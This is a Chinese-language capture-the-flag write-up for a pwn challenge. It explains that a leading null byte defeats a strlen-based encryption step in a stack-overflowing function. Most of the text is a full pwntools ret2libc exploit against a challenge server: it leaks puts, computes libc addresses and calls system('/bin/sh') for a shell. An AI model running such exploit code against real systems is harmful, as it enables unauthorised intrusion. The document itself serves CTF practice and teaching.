题目给出一个菜单，分别是加密、解密和退出

当选择1时，程序会进入加密函数

当输入2时，程序会输出“I think u can ....”

当输入3时，程序会退出

分析加密函数，可以看到，程序存在一个栈溢出漏洞，并且会对用户的输入进行一系列加密，但是它使用的是strlen()，该函数会一直检查用户输入，直到遇到"\x00"，所以可以在输入的第一个字符输入"\x00"就可以绕过它的加密逻辑，后续利用ret2libc GetShell.

Exploit:

from pwn import *
from LibcSearcher import *
ip = "49.232.142.230"
port = 17738
p = remote(ip, port)
# p = process("./pwn")
elf = ELF("./pwn")
rop = ROP("./pwn")
rdi = rop.find_gadget(["pop rdi", "ret"])[0]
ret = rop.find_gadget(["ret"])[0]
main = elf.symbols["main"]
plt = elf.plt["puts"]
got = elf.got["puts"]
p.sendlineafter(b"choice!\n", b"1")
payload = b"\0"
payload += b"a"*(0x50 + 0x8 - 0x1)
payload += p64(rdi)
payload += p64(got)
payload += p64(plt)
payload += p64(main)
p.sendlineafter(b"encrypted\n", payload)
puts = u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
log.success("puts ---> %#x", puts)
libc_base = puts - 0x06f6a0
system = libc_base + 0x0453a0
binsh = libc_base + 0x18ce57
'''libc = LibcSearcher("puts", puts)
libc_base = puts - libc.dump("puts")
system = libc_base + libc.dump("system")
binsh = libc_base + libc.dump("str_bin_sh")'''
payload2 = b"\0"
payload2 += b"a"*(0x50 + 0x8 - 0x1)
payload2 += p64(ret)
payload2 += p64(rdi)
payload2 += p64(binsh)
payload2 += p64(system)
p.sendlineafter(b"choice!\n", b"1")
p.sendlineafter(b"encrypted\n", payload2)
p.interactive()

libc: libc6_2.23-0ubuntu11.3_amd64